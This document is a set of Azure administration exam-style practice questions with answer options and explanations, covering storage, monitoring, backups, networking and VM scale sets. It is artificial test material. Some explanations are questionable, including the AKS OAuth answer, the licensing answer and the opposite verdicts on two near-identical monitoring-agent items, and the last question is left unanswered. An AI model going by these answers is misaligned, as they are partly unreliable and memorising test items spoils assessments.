The Account kind of an Azure Storage account determines the type of data it can store and how it operates. If you want to set the Account kind to BlockBlobStorage, you must first ensure that the Performance setting is set to Premium. Why? BlockBlobStorage accounts are designed specifically for high-performance workloads using block blobs, and they require the Performance setting to be Premium; the default Standard performance setting is only available for General-purpose v2 (GPv2) accounts and not for BlockBlobStorage accounts. Why not the other options? (b) Replication (ZRS): replication type (LRS, ZRS, GRS, etc.) affects data redundancy but does not impact the ability to select BlockBlobStorage as the account kind. (c) Access tier (Cool): access tiers (Hot, Cool, Archive) determine how frequently data is accessed but do not affect the account kind; BlockBlobStorage accounts only support the Hot and Cool tiers, but changing this setting alone would not allow you to select BlockBlobStorage. (d) Hierarchical namespace: hierarchical namespace is required for Azure Data Lake Storage (ADLS) but is unrelated to BlockBlobStorage; BlockBlobStorage accounts do not support hierarchical namespaces.
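A hedged Az PowerShell sketch of creating such an account with a premium SKU (names and region are placeholders; Premium_ZRS availability depends on the region, and Premium_LRS would equally satisfy the account-kind requirement):

    # BlockBlobStorage requires a premium performance SKU.
    New-AzStorageAccount -ResourceGroupName "RG1" -Name "storage1" `
        -Location "eastus" -SkuName "Premium_ZRS" -Kind "BlockBlobStorage"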
You administer a solution in Azure that is currently having performance issues. You need to find the cause of the performance issues by examining metrics on the Azure infrastructure. Which of the following tools should you use?
Azure Traffic Analytics
Azure Monitor
Azure Activity Log
Azure Advisor
When diagnosing performance issues in an Azure solution, you need a tool that provides real-time and historical performance metrics for Azure infrastructure (such as CPU, memory, disk I/O, and network usage). Azure Monitor is the best choice because it collects, analyzes, and visualizes performance metrics from Azure resources (VMs, databases, networking, applications, etc.); it provides real-time monitoring and alerting to detect performance bottlenecks; it integrates with Log Analytics and Application Insights to correlate system- and application-level issues; and it includes Azure Metrics Explorer to analyze CPU, memory, and network performance trends over time. Why not the other options? (a) Azure Traffic Analytics focuses on network traffic analysis from Azure Network Watcher; it helps detect DDoS attacks and network anomalies but does not analyze infrastructure metrics like CPU or memory usage. (c) Azure Activity Log tracks administrative and security-related events (e.g., resource creation, deletion, and role assignments) and does not provide real-time performance metrics. (d) Azure Advisor provides best-practice recommendations to improve security, performance, and cost-efficiency but does not offer detailed infrastructure monitoring or real-time performance insights.
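For example, infrastructure metrics can be pulled from Azure Monitor with Az PowerShell; the resource ID below is a hypothetical placeholder:

    # CPU metrics for a VM over the last 24 hours, in 5-minute intervals.
    $vmId = "/subscriptions/<subscription-id>/resourceGroups/RG1/providers/Microsoft.Compute/virtualMachines/VM1"

    Get-AzMetric -ResourceId $vmId -MetricName "Percentage CPU" `
        -StartTime (Get-Date).AddDays(-1) -EndTime (Get-Date) -TimeGrain 00:05:00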
You have an Azure subscription named Subscription1. Subscription1 contains a resource group named RG1. RG1 contains resources that were deployed by using templates. You need to view the date and time when the resources were created in RG1. Solution: From the Subscriptions blade, you select the subscription, and then click Programmatic deployment. Does the solution meet the goal?
Yes
No
The goal is to view the date and time when resources were created in resource group RG1. The proposed solution suggests navigating to Programmatic deployment from the Subscriptions blade, but this will not provide the required creation timestamps. Why is this solution incorrect? The Programmatic deployment section in Azure only provides deployment options (such as ARM templates, Bicep, or Terraform); it does not show historical deployment details or resource creation timestamps. The correct place to find resource creation timestamps is the Activity Log or Deployments section of RG1. Correct approaches to view the resource creation date and time: 1) Using the Activity Log (best method): in the Azure portal, navigate to RG1, select Activity Log, and filter by “Deployment” events to see when resources were created; this log contains timestamps and details of deployments, including which resources were deployed and by whom. 2) Using the Deployments section in RG1: go to RG1 → Deployments; this section shows the history of ARM template deployments, including timestamps. 3) Using Azure Resource Graph Explorer (for advanced queries): you can run queries to check when each resource was created. In short, Programmatic deployment does not contain resource creation timestamps; the Activity Log or Deployments section in RG1 is the correct way to get this information.
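The same Activity Log information can be pulled with Az PowerShell, for example:

    # Deployment-related events for RG1 over the last 7 days, with timestamps and callers.
    Get-AzLog -ResourceGroupName "RG1" -StartTime (Get-Date).AddDays(-7) |
        Select-Object EventTimestamp, OperationName, Caller, Status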
You have an Azure subscription named Subscription1. Subscription1 contains a resource group named RG1. RG1 contains resources that were deployed by using templates. You need to view the date and time when the resources were created in RG1. Solution: From the Subscriptions blade, you select the subscription, and then click Resource providers. Does the solution meet the goal?
Yes
No
The goal is to view the date and time when resources were created in resource group RG1. The proposed solution suggests going to the Subscriptions blade, selecting the subscription, and clicking Resource providers. However, this does not provide resource creation timestamps. Why is this solution incorrect? Resource providers in Azure manage different resource types (e.g., Microsoft.Compute for VMs, Microsoft.Storage for storage accounts). This section only registers and manages resource providers; it does not show deployment history or timestamps and does not track when resources were created. Correct approaches to view the resource creation date and time: Method 1, using the Activity Log (best method): in the Azure portal, navigate to RG1, click Activity Log, and apply a filter for “Deployment” events; this will show a timestamp for when each resource was created. Method 2, checking the Deployments section in RG1: go to RG1 and click Deployments to see ARM template deployments, including timestamps of when resources were provisioned. Method 3, using Azure Resource Graph (advanced queries): query Azure Resource Graph Explorer to find resource creation timestamps programmatically. Resource providers do not store or display resource creation timestamps; the correct way to check them is through the Activity Log or Deployments section in RG1.
You have an Azure subscription named Subscription1. Subscription1 contains a resource group named RG1. RG1 contains resources that were deployed by using templates. You need to view the date and time when the resources were created in RG1. Solution: From the RG1 blade, you click Automation script. Does the solution meet the goal?
Yes
No
The goal is to view the date and time when resources were created in resource group RG1. The proposed solution suggests navigating to RG1 and clicking Automation script, but this does not provide the required resource creation timestamps. Why is this solution incorrect? The Automation script feature in Azure generates an ARM template for the existing resource group. This template includes the current configuration of the resources but does not show timestamps of when they were created; it is used for redeploying resources, not for tracking their creation history. Correct approaches to view the resource creation date and time: Method 1, using the Activity Log (best method): in the Azure portal, navigate to RG1, click Activity Log, and apply a filter for “Deployment” events to see timestamps of when each resource was created. Method 2, checking the Deployments section in RG1: go to RG1 and click Deployments to see ARM template deployments, including timestamps of when resources were provisioned. Method 3, using Azure Resource Graph (advanced queries): query Azure Resource Graph Explorer to find resource creation timestamps programmatically. Automation script only generates a template for existing resources and does not track creation timestamps; the correct way to find the resource creation time is via the Activity Log or Deployments section in RG1.
You have an Azure subscription named Subscription1. Subscription1 contains a resource group named RG1. RG1 contains resources that were deployed by using templates. You need to view the date and time when the resources were created in RG1. Solution: From the RG1 blade, you click Deployments. Does the solution meet the goal?
Yes
No
The goal is to view the date and time when the resources were created in resource group RG1. The proposed solution suggests navigating to RG1 and clicking Deployments. This solution is correct because the Deployments section in RG1 provides a history of all ARM template deployments, including the date and time of each deployment, the resources created during it, and its status. Since RG1 was deployed using templates, the Deployments blade accurately tracks when resources were created. How to check deployment history in the Azure portal: navigate to RG1, click Deployments in the left menu, and you will see a list of past deployments along with their timestamps; click a deployment to view details, including which resources were created and when. Alternative ways to check resource creation timestamps: Method 1, using the Activity Log (another valid approach): the Activity Log captures deployment events, including timestamps of when resources were created; navigate to RG1 → Activity Log, then filter for “Deployment” events. Method 2, using Azure Resource Graph (advanced queries): run queries in Azure Resource Graph Explorer to retrieve resource creation timestamps programmatically. Why does this solution work? The Deployments blade stores a history of template-based resource deployments, including creation timestamps, and since RG1 was deployed using templates, this is the most direct and correct way to find the resource creation dates. The deployment history can also be retrieved with PowerShell, as sketched below.
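For example:

    # Template deployments recorded for RG1, with their creation timestamps.
    Get-AzResourceGroupDeployment -ResourceGroupName "RG1" |
        Select-Object DeploymentName, Timestamp, ProvisioningState |
        Sort-Object Timestamp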
The team for a delivery company is configuring a virtual machine scale set. Friday night is typically the busiest time. Conversely, 8 AM on Tuesday is generally the quietest time. Which of the following virtual machine scale set features should be configured to add more machines during that time?
Autoscale
Metric-based rules
Schedule-based rules
A Virtual Machine Scale Set (VMSS) allows you to automatically scale the number of virtual machines (VMs) based on demand or a predefined schedule. Since the company experiences predictable variations in demand, with Friday night being the busiest and Tuesday morning being the quietest, the best approach is to configure schedule-based rules. Schedule-based rules allow you to predefine scaling actions based on time and day (e.g., increase VM instances on Friday nights and decrease them on Tuesday mornings), ensure that additional VMs are available before peak demand occurs to prevent performance issues, and optimize costs by reducing VM instances when demand is low. Why not the other options? (a) Autoscale: “autoscale” is the general term for dynamically increasing or decreasing VM instances based on demand; by itself it does not specify whether scaling is based on time or on system metrics. (b) Metric-based rules: these rules reactively adjust the number of VMs based on real-time metrics (e.g., CPU usage, memory utilization); they do not account for predictable demand spikes ahead of time, making them less effective for scheduled workloads.
Your company has an Azure Active Directory (Azure AD) subscription. You need to deploy five virtual machines (VMs) to your company’s virtual network subnet. The VMs will each have both a public and private IP address. Inbound and outbound security rules for all of these virtual machines must be identical. Which of the following is the least amount of network interfaces needed for this configuration?
5
10
20
40
The least number of network interfaces needed for this configuration is one per VM. Each virtual machine (VM) in Azure requires at least one network interface (NIC) to connect to the virtual network (VNet). The requirement states that each VM must have both a public and a private IP address and that all VMs will have identical inbound and outbound security rules. In Azure, a single NIC can have both a public and a private IP address assigned to it, so the least number of network interfaces needed is one per VM: 5 VMs × 1 NIC per VM = 5 NICs. Why not the other options? (b) 10 (2 NICs per VM): this would be necessary only if each VM required multiple NICs for separate traffic flows; since each NIC can carry both a public and a private IP, two NICs per VM are not required. (c) 20 (4 NICs per VM) and (d) 40 (8 NICs per VM): Azure allows multiple NICs per VM for advanced networking needs (e.g., network appliances, multi-subnet routing), but that is unnecessary in this scenario. A sketch of creating one such NIC follows.
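In Az PowerShell terms (all virtual network, subnet, and IP names are hypothetical placeholders):

    # One NIC per VM, carrying both a private IP (from the subnet) and a public IP.
    $vnet   = Get-AzVirtualNetwork -ResourceGroupName "RG1" -Name "VNet1"
    $subnet = Get-AzVirtualNetworkSubnetConfig -VirtualNetwork $vnet -Name "Subnet1"

    $pip = New-AzPublicIpAddress -ResourceGroupName "RG1" -Name "VM1-pip" `
        -Location "eastus" -AllocationMethod Static

    New-AzNetworkInterface -ResourceGroupName "RG1" -Name "VM1-nic" -Location "eastus" `
        -SubnetId $subnet.Id -PublicIpAddressId $pip.Id

Repeating the last two commands for each of the five VMs yields the five NICs from the answer.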
Your company has an Azure Active Directory (Azure AD) subscription. You need to deploy five virtual machines (VMs) to your company’s virtual network subnet. The VMs will each have both a public and private IP address. Inbound and Outbound security rules for all of these virtual machines must be identical. Which of the following is the least amount of security groups needed for this configuration?
4
3
2
1
A Network Security Group (NSG) is used in Azure to control inbound and outbound traffic to resources within a virtual network (VNet) by defining security rules. In this scenario, we need to deploy five virtual machines (VMs) in a virtual network subnet, assign both public and private IP addresses to each VM, and ensure identical inbound and outbound security rules apply to all five VMs. Since all five VMs require the same security rules, a single NSG is sufficient; it can be associated with the subnet so that every VM inherits the same rules, as sketched below.
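A hedged Az PowerShell sketch of that approach; the rule, names, and address prefix are hypothetical placeholders:

    # One inbound rule as an example; a real deployment would define the full rule set once.
    $rule = New-AzNetworkSecurityRuleConfig -Name "Allow-HTTPS-In" -Direction Inbound `
        -Priority 100 -Access Allow -Protocol Tcp -SourceAddressPrefix "*" -SourcePortRange "*" `
        -DestinationAddressPrefix "*" -DestinationPortRange 443

    $nsg = New-AzNetworkSecurityGroup -ResourceGroupName "RG1" -Name "NSG1" `
        -Location "eastus" -SecurityRules $rule

    # Associate the single NSG with the subnet so all five VMs inherit identical rules.
    $vnet = Get-AzVirtualNetwork -ResourceGroupName "RG1" -Name "VNet1"
    Set-AzVirtualNetworkSubnetConfig -VirtualNetwork $vnet -Name "Subnet1" `
        -AddressPrefix "10.0.0.0/24" -NetworkSecurityGroup $nsg
    $vnet | Set-AzVirtualNetwork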
You have an Azure virtual machine named VM1 that runs Windows Server 2016. You need to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. Solution: You create an event subscription on VM1. You create an alert in Azure Monitor and specify VM1 as the source. Does the solution meet the goal?
Yes
No
The goal is to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. The proposed solution suggests creating an event subscription on VM1 and creating an alert in Azure Monitor with VM1 specified as the source. Why doesn’t this solution work? An event subscription is typically used for event-driven automation (e.g., using Event Grid for notifications), not for monitoring logs and triggering alerts. Azure Monitor alerts require Log Analytics or performance counters to track event logs, which this approach does not include, and simply specifying VM1 as the source in Azure Monitor does not automatically track System event logs. Correct approach: to achieve the goal, the solution should involve Azure Monitor and Log Analytics, using the following steps. Enable the Log Analytics agent on VM1 to collect System event logs. Configure the Log Analytics workspace to collect event logs: go to Azure Monitor → Log Analytics workspace → Advanced settings → Data → Windows Event Logs, add System, and set the level to Error. Create an Azure Monitor alert rule: go to Azure Monitor → Alerts and define a log-based alert that triggers when more than two error events occur within an hour, using a Kusto Query Language (KQL) query in Log Analytics to filter events from the System event log.
You have an Azure virtual machine named VM1 that runs Windows Server 2016. You need to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. Solution: You create an Azure Log Analytics workspace and configure the data settings. You add the Microsoft Monitoring Agent VM extension to VM1. You create an alert in Azure Monitor and specify the Log Analytics workspace as the source. Does the solution meet the goal?
Yes
No
The goal is to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. The proposed solution suggests creating an Azure Log Analytics workspace and configuring data settings, adding the Microsoft Monitoring Agent (MMA) VM extension to VM1, and creating an alert in Azure Monitor with the Log Analytics workspace specified as the source. What this solution does correctly: Log Analytics is required to collect Windows event logs from VM1, and the Microsoft Monitoring Agent (MMA) is needed to send VM1’s logs to Log Analytics. Why doesn’t this solution fully meet the goal? The solution is missing the log query for the alert. Simply adding the agent and workspace does not automatically trigger alerts; you must create a log-query-based alert in Azure Monitor, and the solution does not mention configuring a Kusto Query (KQL) to check for more than two error events in an hour.
You have an Azure virtual machine named VM1 that runs Windows Server 2016. You need to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. Solution: You create an Azure Log Analytics workspace and configure the data settings. You install the Microsoft Monitoring Agent on VM1. You create an alert in Azure Monitor and specify the Log Analytics workspace as the source. Does the solution meet the goal?
Yes
No
The goal is to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. The proposed solution suggests creating an Azure Log Analytics workspace and configuring data settings, installing the Microsoft Monitoring Agent (MMA) on VM1, and creating an alert in Azure Monitor with the Log Analytics workspace specified as the source. Why this solution meets the goal: a Log Analytics workspace is necessary to store and analyze event log data; the Microsoft Monitoring Agent (MMA) is required to send VM1’s event logs to Azure Log Analytics; and Azure Monitor can create alerts based on data stored in the Log Analytics workspace. Once logs are collected, you can configure an alert rule in Azure Monitor using a Kusto Query Language (KQL) query to check for more than two error events in the last hour. A sketch of installing the agent and the kind of query the alert would use follows.
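The workspace ID and key below are placeholders, and the extension names match the classic Log Analytics (MMA) agent:

    # Install the Microsoft Monitoring Agent extension on VM1 so its System event log
    # flows into the Log Analytics workspace (placeholder workspace ID/key).
    Set-AzVMExtension -ResourceGroupName "RG1" -VMName "VM1" -Location "eastus" `
        -Name "MicrosoftMonitoringAgent" -Publisher "Microsoft.EnterpriseCloud.Monitoring" `
        -ExtensionType "MicrosoftMonitoringAgent" -TypeHandlerVersion "1.0" `
        -Settings @{ workspaceId = "<workspace-id>" } `
        -ProtectedSettings @{ workspaceKey = "<workspace-key>" }

    # The log alert rule would then evaluate a query along these lines, with a
    # threshold of more than 2 results over a 1-hour window:
    #   Event
    #   | where EventLog == "System" and EventLevelName == "Error"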
You have an Azure virtual machine named VM1 that runs Windows Server 2016. You need to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. Solution: You create an Azure storage account and configure shared access signatures (SASs). You install the Microsoft Monitoring Agent on VM1. You create an alert in Azure Monitor and specify the storage account as the source. Does the solution meet the goal?
Yes
No
The goal is to create an alert in Azure when more than two error events are logged to the System event log on VM1 within an hour. The proposed solution suggests creating an Azure storage account and configuring shared access signatures (SASs), installing the Microsoft Monitoring Agent (MMA) on VM1, and creating an alert in Azure Monitor with the storage account specified as the source. Why this solution does NOT meet the goal: Azure storage accounts are not used for event log monitoring; they store data such as blobs, files, and tables and do not hold Windows event logs from VM1 for Azure Monitor to analyze. Shared access signatures (SASs) are irrelevant here; SAS is used to grant temporary access to Azure Storage data, not for monitoring system logs. Azure Monitor cannot use a storage account as a source for event log alerts; to monitor Windows event logs, Azure Monitor must use a Log Analytics workspace, not a storage account.
You have an Azure virtual machine named VM1. VM1 was deployed by using a custom Azure Resource Manager template named ARM1.json. You receive a notification that VM1 will be affected by maintenance. You need to move VM1 to a different host immediately. Solution: From the Overview blade, you move the virtual machine to a different subscription. Does the solution meet the goal?
Yes
No
The goal is to move VM1 to a different host immediately to avoid maintenance impact. The proposed solution suggests: Moving the virtual machine (VM1) to a different subscription from the Overview blade in the Azure portal. Why This Solution Does NOT Meet the Goal: Moving a VM to a different subscription does not change its physical host. Subscription changes affect billing and access control, not the VM's physical infrastructure. The VM remains in the same Azure region and physical datacenter, meaning it will still be affected by maintenance. To move the VM to a different host, you need to redeploy it. Redeploying a VM assigns it to a new physical host in the same region.
You have an Azure virtual machine named VM1. VM1 was deployed by using a custom Azure Resource Manager template named ARM1.json. You receive a notification that VM1 will be affected by maintenance. You need to move VM1 to a different host immediately. Solution: From the Redeploy blade, you click Redeploy. Does the solution meet the goal?
Yes
No
The goal is to move VM1 to a different host immediately because of an upcoming maintenance event. The proposed solution suggests: Navigating to the Redeploy blade in the Azure portal. Clicking Redeploy to move the VM to a new host. Why This Solution Meets the Goal: Redeploying a VM forces Azure to move it to a new physical host within the same region. This action preserves the VM's data, configuration, and IP addresses, ensuring minimal disruption. Azure deallocates the VM, moves it to a new host, and powers it back on.
You have an Azure virtual machine named VM1. VM1 was deployed by using a custom Azure Resource Manager template named ARM1.json. You receive a notification that VM1 will be affected by maintenance. You need to move VM1 to a different host immediately. Solution: From the Update management blade, you click Enable. Does the solution meet the goal?
Yes
No
The goal is to move VM1 to a different host immediately because of an upcoming maintenance event. The proposed solution suggests: Going to the Update Management blade and clicking Enable. Why This Solution Does NOT Meet the Goal: Update Management is used for patching and compliance, not for moving VMs. It helps automate patch deployment and track update compliance. It does NOT affect the VM's host placement. To move a VM to a different host, the correct action is to Redeploy the VM. Redeploying forces Azure to deallocate and move the VM to a new physical host. The "Enable" button in Update Management does not achieve this. Correct Solution: Use the "Redeploy" option. To move a VM to a new host, follow these steps: Azure Portal: Go to the Azure portal and open VM1. In the left-hand menu, select Redeploy. Click Redeploy. PowerShell Command: Set-AzVM -ResourceGroupName "RG1" -Name "VM1" -Redeploy Azure CLI Command: az vm redeploy --resource-group RG1 --name VM1
When establishing a SOHO network with DHCP, you would prefer a printer’s IP address to remain consistent. What will you configure on the router to do this?
Loopback address
APIPA scope
DHCP reservations
DHCP scope
DHCP reservations are used to assign a specific IP address to a particular device (like a printer) based on its MAC address, ensuring that the device always receives the same IP address from the DHCP server. This is especially useful in a SOHO (Small Office/Home Office) network where a printer or networked device needs a consistent address for users to reliably connect to it. Why the other options are incorrect: Loopback address (127.0.0.1) is used for internal testing on the device itself, not for network configurations. APIPA scope assigns addresses in the 169.254.x.x range when no DHCP server is available—it’s a fallback, not a tool for consistent assignments. DHCP scope defines the range of addresses the server can assign, but doesn’t lock a specific one to a device.
You have an Azure subscription that contains an Azure Active Directory (Azure AD) tenant named contoso.com and an Azure Kubernetes Service (AKS) cluster named AKS1. An administrator reports that she is unable to grant access to AKS1 to the users in contoso.com. You need to ensure that access to AKS1 can be granted to the contoso.com users. What should you do first?
From contoso.com, modify the Organization relationships settings
From contoso.com, create an OAuth 2.0 authorization endpoint
Recreate AKS1
From AKS1, create a namespace
Azure Kubernetes Service (AKS) integrates with Azure Active Directory (Azure AD) to manage user authentication and access to the Kubernetes API server. If an administrator is unable to grant access to AKS1, it is likely because Azure AD integration is not correctly configured. One of the key requirements for Azure AD authentication in AKS is to have an OAuth 2.0 authorization endpoint configured in the Azure AD tenant (contoso.com). This endpoint is needed for token-based authentication, allowing users from contoso.com to authenticate and interact with the AKS cluster. When you create the OAuth 2.0 authorization endpoint, it enables AKS to use Azure AD for authentication, making it possible to assign RBAC (Role-Based Access Control) roles to users and grant them access to AKS1. Why not the other options? (a) Modify Organization relationships settings – This is used for configuring external collaboration (B2B) but is not relevant to granting internal users access to AKS. (c) Recreate AKS1 – Recreating the cluster is unnecessary; the issue is with authentication, not the cluster itself. (d) Create a namespace – Namespaces are used for organizing workloads in Kubernetes but do not impact authentication or user access control.
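For reference only (this is a newer mechanism than the OAuth endpoint described above, and the resource group name RG1 and the admin group object ID are assumptions), on current AKS versions Azure AD integration is typically enabled as AKS-managed Entra ID integration, after which Kubernetes RBAC roles can be granted to contoso.com users:
# Sketch: enable AKS-managed Azure AD (Entra ID) integration on an existing cluster.
# RG1 and the admin group object ID are placeholders.
az aks update \
  --resource-group RG1 \
  --name AKS1 \
  --enable-aad \
  --aad-admin-group-object-ids <admin-group-object-id>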
You must resolve the licensing issue before attempting to assign the license again. What should you do?
From the Groups blade, invite the user accounts to a new group
From the Profile blade, modify the usage location
From the Directory role blade, modify the directory role
In Azure Active Directory (Azure AD), licensing issues often occur due to insufficient permissions to assign or manage licenses. Only users with the necessary directory roles can assign licenses to other users. If an administrator or user is unable to assign a license, it may be because they lack the required administrative privileges. By modifying the directory role in the Directory role blade, you can assign a higher privilege role (such as License Administrator or Global Administrator) to the user, enabling them to resolve licensing issues and assign licenses again. Why not the other options? (a) Invite the user accounts to a new group – While groups can be used for license assignment, they do not resolve licensing issues caused by insufficient permissions. (b) Modify the usage location – Usage location is required for license assignment, but if the issue is related to permissions, changing the usage location won’t help.
Your company’s Azure subscription includes Azure virtual machines (VMs) that run Windows Server 2016. One of the VMs is backed up daily using Azure Backup Instant Restore. When the VM becomes infected with data encrypting ransomware, you are required to restore the VM. Which of the following actions should you take?
You should restore the VM after deleting the infected VM
You should restore the VM to any VM within the company’s subscription
You should restore the VM to a new Azure VM
You should restore the VM to an on-premises Windows device
In the event of a ransomware infection on an Azure VM that is backed up using Azure Backup Instant Restore, it’s generally recommended to restore the VM to a new Azure VM. This ensures that you are not using the compromised VM, and you can have confidence that the new VM is clean and unaffected by the ransomware. When a virtual machine (VM) is infected with data-encrypting ransomware, it is crucial to restore the system from a clean backup to prevent reinfection. Azure Backup Instant Restore allows you to recover a VM from a previous snapshot before it was compromised. The best approach is to restore the VM to a new Azure VM rather than overwriting the infected one. This ensures that: The infected VM is isolated to prevent the ransomware from spreading. A clean, uncompromised VM is restored from the latest safe backup. You can verify and test the restored VM before putting it back into production. Why not the other options? (a) Restore after deleting the infected VM – Deleting the infected VM before restoring is not recommended because you may need it for forensic analysis to determine how the ransomware entered. (b) Restore to any VM within the company’s subscription – Restoring to an existing VM is risky because it may already be compromised or have different configurations. A fresh VM ensures a clean environment. (d) Restore to an on-premise Windows device – Azure Backup is designed for cloud recovery, and restoring to an on-premises device is not a standard approach for VM recovery.
You have an Azure subscription named Subscription1. Subscription1 contains two Azure virtual machines named VM1 and VM2. VM1 and VM2 run Windows Server 2016. VM1 is backed up daily by Azure Backup without using the Azure Backup agent. VM1 is affected by ransomware that encrypts data. You need to restore the latest backup of VM1. To which location can you restore the backup? NOTE: Each correct selection is worth one point. You can perform a file recovery of VM1 to:
VM1 only
VM1 or a new Azure Virtual Machine only
VM1 and VM2 only
A new Azure Virtual Machine only
Any Windows computer that has internet connectivity
Azure Backup provides two main types of backups for virtual machines: Backup with Azure Backup Agent – Used for file and folder-level recovery. Backup without Azure Backup Agent (Azure VM Backup) – Captures the entire VM for disaster recovery. Since VM1 is backed up without using the Azure Backup agent, it means Azure Backup Snapshot is used, which allows for File Recovery instead of full VM recovery. With Azure Backup's File Recovery feature, you can: Mount the recovery point as a network drive. Copy files from the backup to any Windows computer that has an internet connection. This means you can recover files from VM1's backup to any Windows machine that is connected to the internet, including VM1, VM2, or even an on-premises machine. Why not the other options? VM1 only: You are not restricted to restoring files only to VM1. VM1 or a new Azure Virtual Machine only: You can restore files to any Windows computer, not just Azure VMs. VM1 and VM2 only: You are not limited to these VMs; file recovery can be done on any Windows machine. A new Azure Virtual Machine only: While you can restore to a new VM, you are not limited to that.
You have an Azure subscription named Subscription1. Subscription1 contains two Azure virtual machines named VM1 and VM2. VM1 and VM2 run Windows Server 2016. VM1 is backed up daily by Azure Backup without using the Azure Backup agent. VM1 is affected by ransomware that encrypts data. You need to restore the latest backup of VM1. To which location can you restore the backup? NOTE: Each correct selection is worth one point. You restore VM1 to:
VM1 only
VM1 or a new Azure Virtual Machine only
VM1 and VM2 only
A new Azure Virtual Machine only
Any Windows computer that has internet connectivity
Since VM1 is backed up daily by Azure Backup without using the Azure Backup agent, this means the backup is a VM-level backup using Azure's native Azure VM Backup service. Azure VM Backup takes snapshots of the entire VM, allowing for: Restoring the VM in-place (VM1) – This replaces the existing VM with the backup version. Restoring the VM as a new Azure Virtual Machine – This creates a separate VM from the backup while keeping the infected VM intact for forensic analysis. Why not the other options? VM1 only: While you can restore to VM1, you also have the option to restore to a new VM. VM1 and VM2 only: You cannot restore a backup of VM1 directly to VM2 because VM backups are specific to the original VM. A new Azure Virtual Machine only: You can restore to a new VM, but you also have the option to restore in-place to VM1. Any Windows computer that has internet connectivity: This applies only to file-level recovery, but Azure VM Backup restores full VMs, not individual files, so this is incorrect.
You have an Azure web app named App1. App1 has the deployment slots shown in the following table: In webapp1-test, you test several changes to App1. You back up App1. You swap webapp1-test for webapp1-prod and discover that App1 is experiencing performance issues. You need to revert to the previous version of App1 as quickly as possible. What should you do?
Redeploy App1
Swap the slots
Clone App1
Restore the backup of App1
Azure App Service provides deployment slots that allow you to test changes in a staging environment before pushing them to production. In this scenario, you: Tested changes in the staging slot (webapp1-test). Swapped the staging slot (webapp1-test) with the production slot (webapp1-prod), making the new version live. Discovered performance issues after the swap. Since deployment slots retain the previous state, you can quickly swap back to restore the previous version of App1 in production without redeploying. Why is swapping the slots the fastest solution? When you swap slots, Azure maintains the previous app version in the staging slot. Swapping again will immediately revert the changes, bringing back the old production version that was previously in webapp1-prod. This minimizes downtime and avoids the need for a full redeployment or backup restoration. Why not the other options? (a) Redeploy App1: This would take longer because you need to find and redeploy the previous version manually. (c) Clone App1: Cloning creates a new instance but does not restore the previous version immediately. (d) Restore the backup of App1: While restoring a backup could work, it is a slower process compared to simply swapping the slots.
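As a rough sketch (the resource group name RG1 is an assumption, and this assumes webapp1-prod is the default production slot), the swap back can be done with a single Azure CLI command:
# Swap the staging slot back with production to revert to the previous version of App1.
az webapp deployment slot swap \
  --resource-group RG1 \
  --name App1 \
  --slot webapp1-test \
  --target-slot production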
You have two subscriptions named Subscription1 and Subscription2. Each subscription is associated with a different Azure AD tenant. + Subscription1 contains a virtual network named VNet1. + VNet1 contains an Azure virtual machine named VM1 and has an IP address space of 10.0.0.0/16. + Subscription2 contains a virtual network named VNet2. + VNet2 contains an Azure virtual machine named VM2 and has an IP address space of 10.10.0.0/24. You need to connect VNet1 to VNet2. What should you do first?
Move VM1 to Subscription 2
Move VNet1 to Subscription2
Modify the IP address space of VNet2
Provision virtual network gateways
Since VNet1 and VNet2 are in different Azure subscriptions and different Azure AD tenants, you cannot use Virtual Network Peering directly. Instead, you must use VPN Gateway (VNet-to-VNet connection) to connect the two VNets. Steps to Connect VNets Across Different Subscriptions & Tenants: Provision Virtual Network Gateways. Each VNet (VNet1 and VNet2) needs a Virtual Network Gateway with a VPN Gateway SKU to enable secure cross-VNet communication. Create a VNet-to-VNet VPN connection. Configure a site-to-site (S2S) VPN or VNet-to-VNet VPN to establish communication between VNet1 (in Subscription1) and VNet2 (in Subscription2). Establish a Secure Tunnel. The VPN connection enables encrypted communication between resources in both VNets. Why Not the Other Options? (a) Move VM1 to Subscription2: Moving a single VM does not connect the networks; it only relocates the VM. (b) Move VNet1 to Subscription2: Moving VNets between subscriptions is complex and not necessary for cross-subscription connectivity. (c) Modify the IP address space of VNet2: There is no IP address conflict between VNet1 (10.0.0.0/16) and VNet2 (10.10.0.0/24), so modifying the IP space is unnecessary.
You have an Azure subscription that contains three virtual networks named VNET1, VNET2, and VNET3. Peering for VNET1, VNET2 & VNET3 is configured as shown in the following exhibit. How can packets be routed between the virtual networks? Packets from VNET1 can be routed to:
VNET2 only
VNET3 only
VNET2 & VNET3
Azure VNet Peering allows virtual networks (VNets) to communicate as if they were a single network, but only if they are directly peered. By default, Azure does not support transitive routing, meaning traffic cannot automatically pass through one VNet to another unless explicitly allowed. Since the answer is "VNet1 can route packets to both VNet2 & VNet3", this means: VNet1 is directly peered with VNet2. VNet1 is directly peered with VNet3. There is no dependency on transitive routing because VNet1 has a direct connection to both VNet2 and VNet3. Why This Works? Direct peering enables traffic flow between connected VNets. No need for VPN Gateway, NVA, or Azure Route Server, since VNet1 has direct peering with both VNet2 and VNet3. Traffic from VNet1 to VNet2 will flow directly through their peering connection. Traffic from VNet1 to VNet3 will flow directly through their peering connection. Why Not Other Answers? "VNet2 only": This would mean VNet1 is peered only with VNet2, which is incorrect since it also has a direct peering with VNet3. "VNet3 only": This would mean VNet1 is peered only with VNet3, which is incorrect since it also has a direct peering with VNet2.
As a government contractor, you carry out extremely confidential work from home. According to your contract, your computers can only communicate with the external computers you've set up on your router to prevent all other computers from connecting to your network. What will enable you to do this?
Untrusted sources
Hashing
Port filtering
IP address filtering
IP address filtering allows you to control which specific IP addresses are permitted or denied access to your network. As a government contractor dealing with confidential work, this method helps ensure that only pre-approved external computers (with known IP addresses) can connect to your systems, blocking all others from establishing communication. Why the other options are incorrect: Untrusted sources is a general concept, not a technical control mechanism. Hashing is used for data integrity and password protection, not for controlling network access. Port filtering controls access based on port numbers, not specific devices or IPs.
You have an Azure subscription that contains three virtual networks named VNET1, VNET2, and VNET3. Peering for VNET1, VNET2 & VNET3 is configured as shown in the following exhibit. How can packets be routed between the virtual networks? Packets from VNET2 can be routed to:
VNET1 only
VNET3 only
VNET1 & VNET3
